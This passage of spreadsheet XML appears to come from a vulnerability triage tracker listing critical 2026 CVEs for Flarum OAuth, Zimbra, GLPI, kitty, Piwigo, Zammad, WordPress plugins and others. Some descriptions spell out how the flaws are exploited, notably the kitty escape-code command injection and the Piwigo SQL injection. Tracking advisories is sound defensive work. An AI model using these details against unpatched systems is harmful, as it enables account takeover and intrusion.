      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92161</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>composer:fof/oauth</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>1.7.4, 2.0.0-beta.4</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>FriendsOfFlarum OAuth allows users to log in to Flarum with GitHub, Twitter, Facebook, and other providers. Prior to 1.7.4 and 2.0.0-beta.4, the Discord OAuth provider does not check the verified field returned for an OAuth email before passing the address to Flarum core as trusted through provideTrustedEmail(). When Discord sign-in is enabled, an unauthenticated attacker who knows the email address of a Flarum user can configure a Discord account with that unverified address and a verified phone number, then sign in to cause Flarum to match the trusted address, link the attacker-controlled Discord identity to the existing user, and authenticate as the victim without a password or victim interaction. Exploitation requires that the victim's email address is not already associated with a Discord account, and it can compromise administrator accounts. Other bundled providers were not confirmed to be practically exploitable by this method because their relevant authentication flows return only verified or confirmed email addresses. This issue is fixed in versions 1.7.4 and 2.0.0-beta.4.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92161</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92609</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Session fixation in HTTP management authentication allows remote attackers to gain unauthorized access to an authenticated management session via reuse of a session identifier retained across successful authentication.
This issue affects Apache Qpid Broker-J: through 10.1.0.
Users are recommended to upgrade to version 10.1.1, which fixes the issue.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92609</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93643</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-863</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>When OnlyOffice/Document Editing is available, an unauthenticated remote attacker with access to an existing supported public Briefcase document can abuse unsigned save fields to perform path-traversal writes and execute commands as zimbra.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93643</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48482</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, a form administrator can use Form import with a crafted illustration or scene identifier that traverses outside the intended custom-asset directory. The imported file can be written to an executable server location, allowing a malicious script to be invoked remotely. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48482</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93641</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated sender can forge a share notification that triggers stored XSS when a signed-in Zimbra Classic recipient clicks Accept Share, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93641</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93642</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated sender can forge a share notification that triggers stored XSS when a signed-in Zimbra Modern recipient clicks Accept Share, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93642</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93647</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>cve@rapid7.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>An unauthenticated calendar sender can place active markup in a COUNTER message's RFC From address. Selecting the message in Zimbra Classic triggers stored XSS, allowing the attacker to access mailbox data and act as the victim.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93647</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95832</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements in Output Used by a Downstream Component in the colour control escape code handler in kitty from 0.47.3 before 0.49.0 allows a program writing to the terminal to execute an arbitrary command in the user's shell, because color_control() in kitty/window.py answers a query for an unrecognised field name by placing that field name into the reply, and write_escape_code_to_child() in kitty/screen.c then writes the reply to the pseudoterminal master, where it is not distinguishable from input typed by the user, without neutralising it for the shell that reads it. The payload is reduced to printable ASCII before the field name is echoed, which is the restriction introduced in 0.47.3 as the fix for CVE-2026-54057, and the record and field separators ; and = are consumed as delimiters, but every other printable character survives, which is sufficient to compose a shell command. A newline is available from handle_remote_ssh() in kitty/window.py, which writes the bytes yielded by get_ssh_data() in kittens/ssh/utils.py, the first of which begin with a newline, to the pseudoterminal master before any credential carried in the request is checked. The reply is framed as an OSC sequence carrying the escape code number, the field name, and the literal value ?. This results in execution of an attacker-chosen command with the privileges of the user running the terminal.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95832</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39353</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-732, CWE-98</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2-rc-1, InvoicePlane builds its permitted template list by scanning a PHP template directory that can be written through an administrator-controlled file-write capability. A malicious PHP file placed in the directory is automatically trusted by Mdl_templates and can be selected as public_invoice_template. When a public invoice is rendered, the guest View controller includes the trusted file and executes it with web-server privileges. This issue is fixed in version 1.7.2-rc-1.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39353</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42322</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/themes_standard_pages.php validates uploaded logo content by MIME type but reuses the attacker-controlled extension from std_pgs_logo when constructing the stored filename. An authenticated administrator can upload image content with a server-executable final extension, causing the file to be placed in the web-accessible logo directory and executed when requested if the web server handles that extension. This can permit arbitrary command execution, data disclosure, modification, persistence, and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42322</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62262</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. In 17.0.0beta1 and earlier, when rating is enabled, an unauthenticated guest can call pwg.images.filteredSearch.create with a crafted ratings[] value and then open the returned search URL. include/ws_functions/pwg.images.php stores the unvalidated value in the search rules, and include/functions_search.inc.php integer-casts only the lower rating bound while concatenating the raw value as the SQL upper bound. This allows error-based or blind extraction of database information and database-dependent time delays through the public search flow. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62262</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84458</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when the "Automatic account link on initial logon" setting is enabled, Zammad binds an incoming third-party (SSO) identity to an existing local account by matching the email address the identity provider reports, without verifying that the provider actually confirmed ownership of that email. An attacker who controls any identity at a configured provider, including, by default, any Azure AD tenant via Zammad's multi-tenant Microsoft 365 /common app registration, can set that identity's email to a victim's address, authenticate, and be logged in as the victim. This bypasses the victim's local password entirely and affects any existing account, including agents and administrators. Zammad will honor the xms_edov ID token claim when email verification is required in the Microsoft 365 setting, treating a missing claim as unverified. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84458</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89055</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.120.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to permanently delete arbitrary attachments from the Media Library — including administrator-owned product images, logos, and documents — by injecting their IDs into a review that is later trashed and purged. Exploitation requires a public review-form link (a 13-hex formId distributed to customers via e-mail), which exposes the nonce needed to reach the handler without any WordPress account or session.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89055</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93399</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>The Bookly plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 28.2 via the 'bookly_get_form_id', 'bookly_render_complete', 'bookly_add_to_calendar' and 'bookly_rollback_order' AJAX actions. This is due to the 'bookly_get_form_id' handler blindly storing the attacker-controlled 'order_id' from the submitted form_data into a new booking session, which the 'bookly_render_complete' handler then trusts to look up and return the corresponding Order's secret token without verifying that the current session created that order. This makes it possible for unauthenticated attackers to enumerate sequential order IDs, disclose other customers' order tokens, retrieve calendar/appointment information via 'bookly_add_to_calendar' and permanently delete arbitrary non-completed bookings via 'bookly_rollback_order', which cascade-deletes the customer_appointment and (when no other customers are attached) the underlying appointment.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93399</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97063</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
